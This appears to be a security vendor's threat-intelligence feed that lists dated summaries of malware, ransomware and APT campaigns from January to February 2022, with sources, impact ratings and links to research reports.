- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- A newly detailed threat actor, dubbed ‘White Tur’, has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors. The adversary hasn’t been attributed to a specific geography, although it appears to have been active since at least 2017. The adversary was also observed abusing the open source project OpenHardwareMonitor for payload execution.
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- Sugar Ransomware
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Recently a threat actor has started up a RaaS solution that appears to primarily focus on individual computers instead of entire enterprises, but is also reusing objects from other ransomware families. Researchers analysed a sample from a tweet and concluded it was Sugar Ransomware.
Source:
https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb
—
- Intel Source:
- STR
- Intel Name:
- WhisperGate Lateral Movement_Seeder Queries_02/02/2022
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Cybereason
- Intel Name:
- PowerLess Trojan by Phosphorus/APT35
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Cybereason researchers recently discovered a new set of tools which were developed by the Phosphorus group and incorporated into their arsenal, including a novel PowerShell backdoor dubbed PowerLess Backdoor. The research also highlights a stealthy technique used by the group to avoid PowerShell detection: running the PowerShell backdoor in a .NET context rather than spawning the PowerShell process.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater targets Turkish users
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Researchers at Cisco Talos have observed a new campaign targeting Turkish private organizations alongside governmental institutions. They have attributed this campaign with high confidence to MuddyWater, which utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds.
Source:
http://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html
—
- Intel Source:
- Symantec
- Intel Name:
- ShuckWorm targets Ukraine
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- Symantec researchers came across a cyber espionage campaign targeting Ukraine. This campaign was attributed to a well-known threat actor group called Shuckworm, which is allegedly a state-sponsored threat group from Russia.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Lazarus APT
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- This attack includes a clever use of Windows Update to execute the malicious payload and of GitHub as a command and control server by a North Korean APT.
—
- Intel Source:
- AT&T
- Intel Name:
- BotenaGo Malware
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- BotenaGo malware source code is now available to any malicious hacker or malware developer. With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code. Alien Labs expects to see new campaigns based on BotenaGo variants targeting routers and IoT devices globally.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- StellarParticle campaign by CozyBear/APT29
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- Researchers at CrowdStrike have tracked activities of the StellarParticle campaign and its association with the COZY BEAR adversary group. They have also discussed the tactics and techniques leveraged in StellarParticle; a few of the techniques are credential hopping, use of the TrailBlazer implant, and a Linux variant of the GoldMax malware.
Source:
https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
—
- Intel Source:
- Curated Intel
- Intel Name:
- Belarusian Cyber-Partisans group attack national railways
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- A Belarusian hacktivist group, aka the Belarusian Cyber-Partisans, claimed responsibility for a limited attack against the national railway company. A primary objective of the attack, they claimed, was hindering Russian troop movements inside Belarus. Initial access was via BlueKeep RCE (CVE-2019-0708) in RDP on a Windows Server 2008 R2 system. They used the 3proxy[.]ru service to launch attacks from a VPS, and used Mimikatz to dump LSASS, etc.
Source:
https://www.curatedintel.org/2022/01/hacktivist-group-shares-details-related.html
—
- Intel Source:
- Federal Office_German Government
- Intel Name:
- APT 27 targeting German Companies
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- The German government issued a warning about a Chinese cyberespionage campaign that has been targeting German companies by exploiting vulnerabilities in Microsoft Exchange and ZOHO self-service products. The HyperBro malware was used in this campaign.
—
- Intel Source:
- Cyfirma
- Intel Name:
- WaspLocker Ransomware
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- WaspLocker is a ransomware which encrypts files on your system with AES+RSA encryption, appends the .0.locked extension to the encrypted files, and puts them in a folder with the .locked extension. It spreads via phishing, spear phishing and social engineering tactics.
Source:
https://www.cyfirma.com/outofband/ransomware-report-wasplocker/
—
- Intel Source:
- Avast
- Intel Name:
- Chaes Banking Trojan
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- Researchers from Avast discovered that the Chaes banking Trojan has been actively spreading since November 2020. What sets Chaes apart is its multi-stage distribution method, which makes use of programming frameworks such as JScript, Python and NodeJS, binary files written in Delphi, as well as malicious Google Chrome extensions, among other things.
Source:
https://decoded.avast.io/anhho/chasing-chaes-kill-chain/
—
- Intel Source:
- Internal
- Intel Name:
- Log4j 4 IP’s
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- IP addresses linked to the Log4j vulnerability
Source:
Internal Investigations
—
- Intel Source:
- Blackberry
- Intel Name:
- Prophet Spider exploiting Log4j Vulnerability
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- The BlackBerry Research team have discovered an attack correlating the Prophet Spider group with exploitation of the Log4j vulnerability in VMware Horizon. Researchers also claimed to have spotted Prophet Spider TTPs as it sells network access to other criminals, including ransomware gangs. Despite VMware’s patch and subsequent guidance, many implementations remain unpatched, leaving them susceptible to exploitation.
Source:
https://blogs.blackberry.com/en/2022/01/log4u-shell4me
—
- Intel Source:
- MalwareBytes
- Intel Name:
- KONNI RAT
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- KONNI is a Remote Administration Tool that has been used for at least 8 years. The North Korean threat actor that is using this piece of malware has been identified under the Kimsuky umbrella. KONNI RAT is being actively developed, and new samples now include significant updates.
Source:
https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/
—
- Intel Source:
- Team Cymru
- Intel Name:
- Analysis of a Management IP Address linked to Molerats APT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Team Cymru have analysed management IP addresses which were linked to the Molerats APT. These were higher-order infrastructure utilizing IP addresses assigned to Palestinian providers. Additionally, the targets identified were in Israel and Saudi Arabia.
Source:
https://team-cymru.com/blog/2022/01/26/analysis-of-a-management-ip-address-linked-to-molerats-apt/
—
- Intel Source:
- Sophos
- Intel Name:
- Midas Ransomware
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- An attack on a technology vendor was identified, and the ransomware behind it was Midas. The Midas ransomware attack highlights the risks of limited access controls and “ghost” tools. The attackers were able to spend nearly two months undetected in the target’s environment.
—
- Intel Source:
- Morphisec
- Intel Name:
- AsyncRAT
- Date of Scan:
- 2022-01-28
- Impact:
- MEDIUM
- Summary:
- Morphisec researchers have identified a new sophisticated campaign whose delivery evades multiple AVs. Through a simple email phishing tactic with an HTML attachment, threat actors are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control infected computers through a secure encrypted connection.
Source:
https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DazzleSpy macOS malware
- Date of Scan:
- 2022-01-27
- Impact:
- MEDIUM
- Summary:
- ESET researchers discovered a new watering hole attack targeting macOS users and visitors of a pro-democracy radio station website in Hong Kong, infecting them with the DazzleSpy malware.
Source:
https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/
—
- Intel Source:
- Cofense
- Intel Name:
- TrickBot Invoices
- Date of Scan:
- 2022-01-27
- Impact:
- HIGH
- Summary:
- In the new campaign, TrickBot is taking advantage of supply chain delays and sending phishing emails to users with an invoice attachment claiming to be from USPS. This TrickBot campaign demonstrates more effort than past campaigns, both in the design of the attachment and in the email itself. Most of the time, the style of TrickBot campaign emails is relatively simple and can be easily spotted as suspicious.
Source:
https://cofense.com/blog/trickbot-malware-delivered-as-invoicess
—
- Intel Source:
- STR
- Intel Name:
- PKEXEC LPE/CVE-2021-4034_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- WhisperGate TTP_Seeder Queries
- Date of Scan:
- 2022-01-26
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Fortinet
- Intel Name:
- STRRAT Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet have identified an email which was subsequently found to harbor a variant of the STRRAT malware as an attachment. STRRAT is a multi-capability Remote Access Trojan that dates to at least mid-2020. Unusually, it is Java-based, and it is typically delivered to victims via phishing email.
Source:
https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign
—
- Intel Source:
- Trend Micro
- Intel Name:
- APT36/Earth Karkaddan
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- According to Trend Micro researchers, the suspected Pakistani threat actor group APT36, aka Earth Karkaddan, has expanded its malware arsenal by adding a new Android RAT malware, CapraRAT.
—
- Intel Source:
- Cleafy Labs
- Intel Name:
- BRATA RAT malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have tracked BRATA malware and have documented its evolution in terms of both new targets and new features.
Source:
https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account
—
- Intel Source:
- IBM
- Intel Name:
- Trickbot’s new evasion technique
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- As per SecurityIntelligence researchers, TrickBot operators have been escalating activity. As part of that escalation, malware injections have been fitted with added protection to keep researchers out and get through security controls.
Source:
https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/
—
- Intel Source:
- Netskope
- Intel Name:
- Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
- Date of Scan:
- 2022-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope have identified an increase in the usage of one specific file type from the Microsoft Office suite: PowerPoint. These relatively small files are being delivered through phishing emails, then download and execute malicious scripts through LOLBins, a common technique often used to stay under the radar.
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- OceanLotus APT attack
- Date of Scan:
- 2022-01-25
- Impact:
- HIGH
- Summary:
- The state-sponsored threat actor group known as OceanLotus is using the web archive file format to evade system detection while delivering backdoors for intrusion. A report from QI-ANXIN Threat Intelligence Center claims that OceanLotus’s campaign is actively using web archive files (.MHT and .MHTML) for its attacks.
—
- Intel Source:
- Proofpoint
- Intel Name:
- DTPacker
- Date of Scan:
- 2022-01-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have identified a malware packer which they have dubbed ‘DTPacker’. The malware is typically used to pack remote access trojans that can be used to steal information and load follow-on payloads such as ransomware.
Source:
https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1
—
- Intel Source:
- STR
- Intel Name:
- MoonBounce Implant_Seeder Queries
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries – 24/01/2022
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Gemini Advisory
- Intel Name:
- FIN7 trojanized USB
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- Gemini Advisory researchers found the FIN7 group using flash drives to spread a Remote Access Trojan. It uses the trojanized USB devices to ultimately load the IceBot Remote Access Trojan (RAT), resulting in FIN7 gaining unauthorized remote access to systems within victims’ networks.
Source:
https://geminiadvisory.io/fin7-flash-drives-spread-remote-access-trojan/
—
- Intel Source:
- Zscaler
- Intel Name:
- Molerats APT Espionage campaign
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- The Zscaler ThreatLabz team have detected several samples of macro-based MS Office files uploaded from Middle Eastern countries. These files contained decoy themes related to geo-political conflicts between Israel and Palestine. Such themes have been used in previous attack campaigns waged by the Molerats APT.
—
- Intel Source:
- ASEC
- Intel Name:
- DDoS IRC Bot Malware
- Date of Scan:
- 2022-01-24
- Impact:
- LOW
- Summary:
- The ASEC Research Team has discovered that DDoS IRC Bot strains disguised as adult games are being installed via webhards. Webhards are platforms commonly used for the distribution of malware in Korea, where njRAT and UDP Rat were distributed in the past.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Emotet Spam
- Date of Scan:
- 2022-01-24
- Impact:
- HIGH
- Summary:
- The Trend Micro research team spotted the new ransomware family named ‘White Rabbit’, which is discreetly making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.
—
- Intel Source:
- Akamai
- Intel Name:
- Mirai Botnet Abusing Log4j
- Date of Scan:
- 2022-01-21
- Impact:
- HIGH
- Summary:
- Researchers at Akamai have examined an ARM binary which revealed the adaptation of the Log4j vulnerability to infect and assist in the proliferation of malware used by the Mirai botnet.
Source:
https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- DONOT Hacking team/APT-C-35/SectorE02
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- ESET researchers take a deep look into recent attacks carried out by Donot Team throughout 2020 and 2021 targeting government and military entities in several South Asian countries.
Source:
https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
—
- Intel Source:
- BitDefender
- Intel Name:
- BHUNT Stealer
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Bitdefender researchers have discovered a new family of crypto-wallet stealer malware dubbed ‘BHUNT’. The samples identified appear to have been digitally signed with a digital certificate issued to a software company, but the digital certificate does not match the binaries.
—
- Intel Source:
- INKY
- Intel Name:
- DoL Phishing
- Date of Scan:
- 2022-01-21
- Impact:
- MEDIUM
- Summary:
- Researchers at INKY have detected a phishing campaign that impersonated the United States Department of Labor (DoL). In this campaign, the majority of phishing attempts had sender email addresses spoofed to look as if they came from no-reply@dol[.]gov, which is the real DoL site. A small subset was spoofed to look as if they came from no-reply@dol[.]com, which is of course not the real DoL domain.
—
- Intel Source:
- Microsoft
- Intel Name:
- WhisperGate
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- MSTIC found a destructive malware operation that has been targeting organizations in Ukraine. The malware has been dubbed WhisperGate. The activity has been identified as possible Master Boot Record (MBR) wiper activity.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Targeted ICS Spyware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Kaspersky ICS Experts have noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.
—
- Intel Source:
- Elastic
- Intel Name:
- Operation Bleeding Bear
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Researchers at Elastic Security provide new analysis and insights into a targeted campaign against Ukrainian organizations with destructive malware. In a multi-staged attack, one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR), making any impacted machine inoperable after boot-up.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Blackcat Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne have analysed BlackCat ransomware behaviour. BlackCat first appeared in late November 2021 and has reportedly been attacking targets in multiple countries, including Australia, India and the U.S., demanding ransoms in the region of $400,000 to $3,000,000 in Bitcoin or Monero.
—
- Intel Source:
- Trend Micro
- Intel Name:
- White Rabbit Ransomware
- Date of Scan:
- 2022-01-20
- Impact:
- MEDIUM
- Summary:
- The Trend Micro research team spotted the new ransomware family named ‘White Rabbit’, which is discreetly making a name for itself by executing an attack on a local US bank in December 2021. The ransomware copies the hiding capability from Egregor and carries a potential connection to the APT group FIN8.
—
- Intel Source:
- Kaspersky
- Intel Name:
- MoonBounce
- Date of Scan:
- 2022-01-20
- Impact:
- HIGH
- Summary:
- Kaspersky researchers have identified a UEFI firmware-level compromise. Further analysis detected that a single component within the inspected firmware image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.
Source:
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO C2_Seeder Queries – 18/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- SysJoker_Seeder Queries – 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Bushidotoken
- Intel Name:
- (Mailbox Phishing Kit)Espionage campaign- Renewable energy companies
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- A security researcher discovered a large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organizations. The attacker uses a custom ‘Mail Box’ toolkit, an unsophisticated phishing package deployed on the actors’ infrastructure as well as on legitimate websites compromised to host phishing pages.
—
- Intel Source:
- Uptycs
- Intel Name:
- vSphere cryptominer campaign
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs identified some malicious shell scripts which specifically target VMware vSphere. The attackers have used certain commands in the shell script to modify the vSphere service in order to run the XMRig miner.
Source:
https://www.uptycs.com/blog/cryptominer-campaign-targeting-vmware-vsphere-services-for-coin-mining
—
- Intel Source:
- STR
- Intel Name:
- AIKIDO ICEID New Delivery Method_Seeder Queries – 12/01/2022
- Date of Scan:
- 2022-01-19
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_MOIS_Seeder Queries – 14/01/2022
- Date of Scan:
- 2022-01-18
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Kaspersky
- Intel Name:
- BlueNoroff APT Group
- Date of Scan:
- 2022-01-14
- Impact:
- HIGH
- Summary:
- The North Korea-linked APT group BlueNoroff has been spotted targeting cryptocurrency startups with fake MetaMask browser extensions. The latest attacks targeted cryptocurrency startups in the US, Russia, China, India, the UK, Ukraine, Poland, Czech Republic, UAE, Singapore, Estonia, Vietnam, Malta, Germany and Hong Kong.
Source:
https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/
—
- Intel Source:
- eSentire
- Intel Name:
- GootLoader Campaign
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- eSentire researchers found that operators of the GootLoader campaign are targeting employees of accounting and law firms. GootLoader is a stealthy initial access malware which, after gaining a foothold on the victim’s computer system, infects it with ransomware or other lethal malware.
—
- Intel Source:
- Microsoft
- Intel Name:
- DEV-0401
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- The Microsoft Threat Intelligence Center has detected activity in which attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. These attacks are performed by a China-based ransomware operator that Microsoft tracks as DEV-0401.
—
- Intel Source:
- Netskope
- Intel Name:
- Abusing MS Office Using Malicious Web Archive Files
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- The OceanLotus group of state-sponsored hackers is now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.
Source:
https://www.netskope.com/blog/abusing-microsoft-office-using-malicious-web-archive-files
—
- Intel Source:
- Avast
- Intel Name:
- Exploit Kits vs Chrome
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Avast researchers found that the Underminer exploit kit developed an exploit for a Chromium-based vulnerability. There were two exploit kits that dared to attack Google Chrome: Magnitude, using CVE-2021-21224 and CVE-2021-31956, and Underminer, using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020 and CVE-2020-1054.
Source:
https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/
—
- Intel Source:
- US cyber command
- Intel Name:
- MuddyWater_MOIS
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- U.S. Cyber Command’s Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater. The techniques used by the APT group include side-loading DLLs in order to trick legitimate programs into running malware, and obfuscating PowerShell scripts to hide command and control functions.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- TellYouThePass Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- CrowdStrike found a re-emerged version of the TellYouThePass ransomware compiled using Golang. The same ransomware was recently associated with Log4Shell post-exploitation targeting Windows and Linux.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- Analysts from AhnLab discovered that the attackers behind the Magniber ransomware, who have been exploiting IE-based vulnerabilities so far, are now targeting PCs via modern browsers such as Edge and Chrome.
—
- Intel Source:
- Cado security
- Intel Name:
- ABCbot
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- Cado Security researchers analyzed Abcbot and found its link with the Xanthe-based cryptojacking campaign. The same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks.
Source:
https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Nanocore Netwire and AsyncRAT
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- Cisco Talos researchers discovered a new attack campaign using public cloud infrastructure to spread RATs; those RATs are Nanocore, Netwire and AsyncRAT.
Source:
https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Patchwork APT
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- Malwarebytes Labs has analysed a campaign where the Patchwork APT has used malicious RTF files to drop a variant of the BADNEWS Remote Administration Trojan (RAT).
Source:
https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/
—
- Intel Source:
- Fortinet
- Intel Name:
- RedLine Stealer
- Date of Scan:
- 2022-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet have identified an executable file, ‘Omicron Stats.exe’, which is attributed to be a variant of the RedLine Stealer malware. Researchers have analysed the new RedLine variant, its core functions, how it communicates with its C2 server, and how organizations can protect themselves.
—
- Intel Source:
- STR
- Intel Name:
- STR Omega 1/12/22
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Checkpoint
- Intel Name:
- APT35
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- Check Point researchers discovered that APT35 has started widespread scanning and attempts to leverage the Log4j flaw in publicly facing systems.
—
- Intel Source:
- Intezer
- Intel Name:
- SysJoker Backdoor
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- Researchers from Intezer discovered a new multi-platform backdoor that targets Windows, Mac and Linux. The backdoor was named SysJoker. SysJoker masquerades as a system update and generates its C2 by decoding a string retrieved from a text file hosted on Google Drive.
Source:
https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/
—
- Intel Source:
- STR
- Intel Name:
- Trojanized dnspy app campaign
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- STR
- Intel Name:
- VMware Horizon Exploitation Using Log4J
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Palo Alto
- Intel Name:
- TA551 IcedID
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit42 researchers have tracked TA551 activity where the threat actor is using Word documents with both German and Italian templates, later delivering the IcedID malware.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Web Skimmer Campaign
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Unit42 have found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka formjacking) campaigns. In skimmer attacks, cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site’s HTML form page to collect sensitive user information.
Source:
https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Zloader Banking Malware Campaign
- Date of Scan:
- 2022-01-05
- Impact:
- MEDIUM
- Summary:
- The Check Point Research team is tracking the Zloader campaign and identified evidence that the new campaign was first seen around early November 2021. The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine.